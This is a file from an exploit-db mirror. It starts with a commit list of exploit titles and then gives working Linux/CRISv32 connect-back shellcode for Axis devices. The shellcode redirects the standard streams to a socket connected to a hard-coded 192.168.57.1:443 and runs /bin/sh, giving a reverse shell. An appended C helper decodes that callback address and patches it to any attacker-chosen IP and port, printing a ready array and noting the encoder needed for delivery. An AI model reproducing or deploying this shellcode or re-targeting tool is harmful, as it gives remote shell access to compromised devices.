exploit-db-mirror/platforms/linux_crisv32/shellcode/40128.c
Offensive Security 893d590404 DB: 2017-02-02
12 new exploits

PHP 5.2.0 (Windows x86) - (PHP_win32sti) Local Buffer Overflow
PHP 5.2.0 (Windows x86) - 'PHP_win32sti' Local Buffer Overflow

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)

PHP 5.3.0 - getopt() Denial of Service
PHP 5.3.0 - 'getopt()' Denial of Service

Apple Safari 4.0.3 (Windows x86) - CSS Remote Denial of Service
Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (2)

PHP 4.3.x/5.0 - openlog() Buffer Overflow
PHP 4.3.x/5.0 - 'openlog()' Buffer Overflow
Google Android - 'cfp_ropp_new_key_reenc' and 'cfp_ropp_new_key' RKP Memory Corruption
Google Android - Unprotected MSRs in EL1 RKP Privilege Escalation
Apple WebKit - 'HTMLFormElement::reset()' Use-After Free
Google Chrome - 'HTMLKeygenElement::shadowSelect()' Type Confusion
Apple WebKit - 'HTMLKeygenElement' Type Confusion
Apple WebKit - Type Confusion in RenderBox with Accessibility Enabled
Google Android - RKP Information Disclosure via s2-remapping Physical Ranges
QNAP NVR/NAS - Buffer Overflow

Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) - UDEV < 1.4.1 Privilege Escalation (1)
Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV < 1.4.1 - Privilege Escalation (1)

Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) - UDEV < 141 Privilege Escalation (2)
Linux Kernel 2.6 (Gentoo / Ubuntu 8.10/9.04) UDEV < 1.4.1 - Privilege Escalation (2)

PHP 5.2.9 (Windows x86) - Local Safemod Bypass Exploit
PHP 5.2.9 (Windows x86) - Local Safemod Bypass

Linux udev - Netlink Privilege Escalation (Metasploit)
Linux Kernel UDEV < 1.4.1 - Netlink Privilege Escalation (Metasploit)

Google Android - RKP EL1 Code Loading Bypass

Linux/CRISv32 - Axis Communication Connect Back Shellcode (189 bytes)

Syntax Desktop 2.7 - (synTarget) Local File Inclusion
Syntax Desktop 2.7 - 'synTarget' Parameter Local File Inclusion
Joomla! Component JTAG Calendar 6.2.4 - 'search' Parameter SQL Injection
LogoStore - 'query' Parameter SQL Injection
2017-02-02 05:01:18 +00:00


/*
* Title: Axis Communication Linux/CRISv32 - Connect Back Shellcode
* Author: bashis <mcw noemail.eu> / 2016
*
*/
#include <stdio.h>
char sc[] =
//close(0): syscall 6 is close. fds 0-2 are closed first so that socket() below gets fd 0, which is why only two dup2 calls are needed later
"\x7a\x86" // clear.d r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(1)
"\x41\xa2" // moveq 1,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//close(2)
"\x42\xa2" // moveq 2,r10
"\x5f\x9c\x06\x00" // movu.w 0x6,r9
"\x3d\xe9" // break 13
//
"\x10\xe1" // addoq 16,sp,acr
"\x42\x92" // moveq 2,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x02\xf2" // addq 2,acr
//PORT 443
"\x5f\x9e\x01\xbb" // move.w 0xbb01,r9
"\xdf\x9b" // move.w r9,[acr]
"\x10\xe1" // addoq 16,sp,acr
"\x6f\x96" // move.d acr,r9
"\x04\x92" // addq 4,r9
//IP 192.168.57.1
"\x6f\xfe\xc0\xa8\x39\x01" // move.d 139a8c0,acr
"\xe9\xfb" // move.d acr,[r9]
//
//socket()
"\x42\xa2" // moveq 2,r10
"\x41\xb2" // moveq 1,r11
"\x7c\x86" // clear.d r12
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x41\xa2" // moveq 1,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
"\x6a\x96" // move.d $r10,$r9
"\x0c\xe1" // addoq 12,$sp,$acr
"\xef\x9b" // move.d $r9,[$acr]
"\x0c\xe1" // addoq 12,$sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x10\x92" // addq 16,$r9
"\x6f\xaa" // move.d [$acr],$r10
"\x69\xb6" // move.d $r9,$r11
"\x50\xc2" // moveq 16,$r12
//
// connect()
"\x6e\x96" // move.d $sp,$r9
"\xe9\xaf" // move.d $r10,[$r9+]
"\xe9\xbf" // move.d $r11,[$r9+]
"\xe9\xcf" // move.d $r12,[$r9+]
"\x43\xa2" // moveq 3,$r10
"\x6e\xb6" // move.d $sp,$r11
"\x5f\x9c\x66\x00" // movu.w 0x66,$r9
"\x3d\xe9" // break 13
//
//dup2(0,1): syscall 63 is dup2; r10 is the socket fd saved at sp+12 (fd 0 after the close() calls above)
"\x6f\xaa" // move.d [$acr],$r10
"\x41\xb2" // moveq 1,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//
//dup2(0,2)
"\x6f\xaa" // move.d [$acr],$r10
"\x42\xb2" // moveq 2,$r11
"\x5f\x9c\x3f\x00" // movu.w 0x3f,$r9
"\x3d\xe9" // break 13
//execve("//bin/sh", {"//bin/sh", NULL}, NULL): path, argv and envp are built on the stack; syscall 11
"\x90\xe2" // subq 16,$sp
"\x6e\x96" // move.d $sp,$r9
"\x6e\xa6" // move.d $sp,$r10
"\x6f\x0e\x2f\x2f\x62\x69" // move.d 69622f2f,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x6f\x0e\x6e\x2f\x73\x68" // move.d 68732f6e,$r0
"\xe9\x0b" // move.d $r0,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x04\x92" // addq 4,$r9
"\xe9\xab" // move.d $r10,[$r9]
"\x04\x92" // addq 4,$r9
"\x79\x8a" // clear.d [$r9]
"\x10\xe2" // addq 16,$sp
"\x6e\xf6" // move.d $sp,$acr
"\x6e\x96" // move.d $sp,$r9
"\x6e\xb6" // move.d $sp,$r11
"\x7c\x86" // clear.d $r12
"\x4b\x92" // moveq 11,$r9
"\x3d\xe9"; // break 13
int
main(void)
{
    void (*s)(void);
    /* sizeof(sc) counts the string terminator: 188 code bytes + 1 NUL = 189. */
    printf("sc size %zu\n", sizeof(sc));
    /* sc lives in .data; jumping into it only works on a target where that
     * segment is executable, which is what this CRISv32 test harness assumes. */
    s = (void (*)(void))sc;
    s();
    return 0;
}
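Added example, not part of bashis' original shellcode or of the exploit-db entry: a host-side C helper that carries a verbatim copy of the 188 code bytes above (the listing's sizeof(sc) of 189 counts the string terminator), reads back and re-targets the hard-coded callback address, and counts the embedded NUL bytes. It compiles on any POSIX host and never executes the CRIS bytes. The port and IPv4 immediates are taken to sit at offsets 36 and 48; those offsets were computed from the instruction lengths in the listing and are this example's own assumption, as are the `cris_*` function names.

```c
/* Added example (not from the original exploit): host-side helper for the
 * CRISv32 connect-back shellcode. Offsets CRIS_PORT_OFF and CRIS_IP_OFF are
 * assumptions derived from the instruction lengths in the listing. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <arpa/inet.h>

/* Verbatim copy of the 188 code bytes, grouped by the listing's own blocks. */
static const unsigned char cris_sc[] =
    /* close(0); close(1); close(2) via syscall 6 */
    "\x7a\x86\x5f\x9c\x06\x00\x3d\xe9"
    "\x41\xa2\x5f\x9c\x06\x00\x3d\xe9"
    "\x42\xa2\x5f\x9c\x06\x00\x3d\xe9"
    /* struct sockaddr_in at sp+16: family=2, then port, then address */
    "\x10\xe1\x42\x92\xdf\x9b\x10\xe1\x02\xf2"
    "\x5f\x9e\x01\xbb"          /* offset 34: movu.w PORT(net order),r9 */
    "\xdf\x9b\x10\xe1\x6f\x96\x04\x92"
    "\x6f\xfe\xc0\xa8\x39\x01"  /* offset 46: move.d IPv4(net order),acr */
    "\xe9\xfb"
    /* socketcall(SYS_SOCKET, {AF_INET, SOCK_STREAM, 0}) -> returns fd 0 */
    "\x42\xa2\x41\xb2\x7c\x86\x6e\x96\xe9\xaf\xe9\xbf\xe9\xcf\x41\xa2\x6e\xb6"
    "\x5f\x9c\x66\x00\x3d\xe9"
    /* save fd at sp+12, build {fd, &sockaddr, 16} */
    "\x6a\x96\x0c\xe1\xef\x9b\x0c\xe1\x6e\x96\x10\x92\x6f\xaa\x69\xb6\x50\xc2"
    /* socketcall(SYS_CONNECT, ...) */
    "\x6e\x96\xe9\xaf\xe9\xbf\xe9\xcf\x43\xa2\x6e\xb6"
    "\x5f\x9c\x66\x00\x3d\xe9"
    /* dup2(fd,1); dup2(fd,2) via syscall 63 */
    "\x6f\xaa\x41\xb2\x5f\x9c\x3f\x00\x3d\xe9"
    "\x6f\xaa\x42\xb2\x5f\x9c\x3f\x00\x3d\xe9"
    /* execve("//bin/sh", {"//bin/sh", NULL}, NULL) via syscall 11 */
    "\x90\xe2\x6e\x96\x6e\xa6"
    "\x6f\x0e\x2f\x2f\x62\x69\xe9\x0b\x04\x92"
    "\x6f\x0e\x6e\x2f\x73\x68\xe9\x0b\x04\x92"
    "\x79\x8a\x04\x92\x79\x8a\x04\x92\xe9\xab\x04\x92\x79\x8a"
    "\x10\xe2\x6e\xf6\x6e\x96\x6e\xb6\x7c\x86\x4b\x92\x3d\xe9";

enum { CRIS_SC_LEN = sizeof cris_sc - 1, CRIS_PORT_OFF = 36, CRIS_IP_OFF = 48 };

/* Copy the code bytes (without the terminator) into a writable buffer. */
size_t cris_sc_copy(unsigned char *dst, size_t cap)
{
    if (cap < CRIS_SC_LEN) return 0;
    memcpy(dst, cris_sc, CRIS_SC_LEN);
    return CRIS_SC_LEN;
}

/* The movu.w syscall-number immediates contain 0x00 bytes, so this shellcode
 * cannot travel through strcpy-style copies without re-encoding. */
int cris_sc_count_nul(void)
{
    int n = 0;
    for (size_t i = 0; i < CRIS_SC_LEN; i++) n += (cris_sc[i] == 0);
    return n;
}

/* Both immediates are stored exactly as the network-order bytes the kernel
 * expects inside sockaddr_in, so reading them back is a plain memcpy. */
int cris_decode_callback(const unsigned char *sc, size_t len,
                         char *ip, size_t iplen, uint16_t *port)
{
    struct in_addr a; uint16_t p;
    if (len < CRIS_SC_LEN) return -1;
    memcpy(&a, sc + CRIS_IP_OFF, 4);
    memcpy(&p, sc + CRIS_PORT_OFF, 2);
    if (!inet_ntop(AF_INET, &a, ip, (socklen_t)iplen)) return -1;
    *port = ntohs(p);
    return 0;
}

/* Re-target the callback; returns -1 for a short buffer or an unparsable IP. */
int cris_patch_callback(unsigned char *sc, size_t len, const char *ip, uint16_t port)
{
    struct in_addr a; uint16_t p = htons(port);
    if (len < CRIS_SC_LEN || inet_pton(AF_INET, ip, &a) != 1) return -1;
    memcpy(sc + CRIS_IP_OFF, &a, 4);
    memcpy(sc + CRIS_PORT_OFF, &p, 2);
    return 0;
}

/* usage: ./cris_patch [IP PORT]; prints the (re-targeted) bytes as a C array */
int main(int argc, char **argv)
{
    unsigned char buf[CRIS_SC_LEN];
    char ip[INET_ADDRSTRLEN]; uint16_t port;
    cris_sc_copy(buf, sizeof buf);
    if (argc == 3 && cris_patch_callback(buf, sizeof buf, argv[1], (uint16_t)atoi(argv[2])) != 0) {
        fprintf(stderr, "bad callback address %s\n", argv[1]);
        return 1;
    }
    cris_decode_callback(buf, sizeof buf, ip, sizeof ip, &port);
    printf("/* %zu bytes, %d NUL, connects back to %s:%u */\nchar sc[] =\n",
           sizeof buf, cris_sc_count_nul(), ip, (unsigned)port);
    for (size_t i = 0; i < sizeof buf; i++) {
        if (i % 16 == 0) fputs("\"", stdout);
        printf("\\x%02x", buf[i]);
        if (i % 16 == 15 || i + 1 == sizeof buf) fputs("\"\n", stdout);
    }
    puts(";");
    return 0;
}
```

Run without arguments to confirm the listing decodes to 192.168.57.1:443, or with an address and port to emit a re-targeted array. No CRIS byte-order reasoning is needed for the patch: the `movu.w 0xbb01` and `move.d 0x0139a8c0` immediates are simply `htons(443)` and `inet_aton("192.168.57.1")` laid out in memory, and the little-endian CPU copies them into the `sockaddr_in` unchanged. The NUL count is the practical caveat: with zeros inside the syscall-number immediates, the payload needs a delivery channel that tolerates NULs or an encoder in front of it.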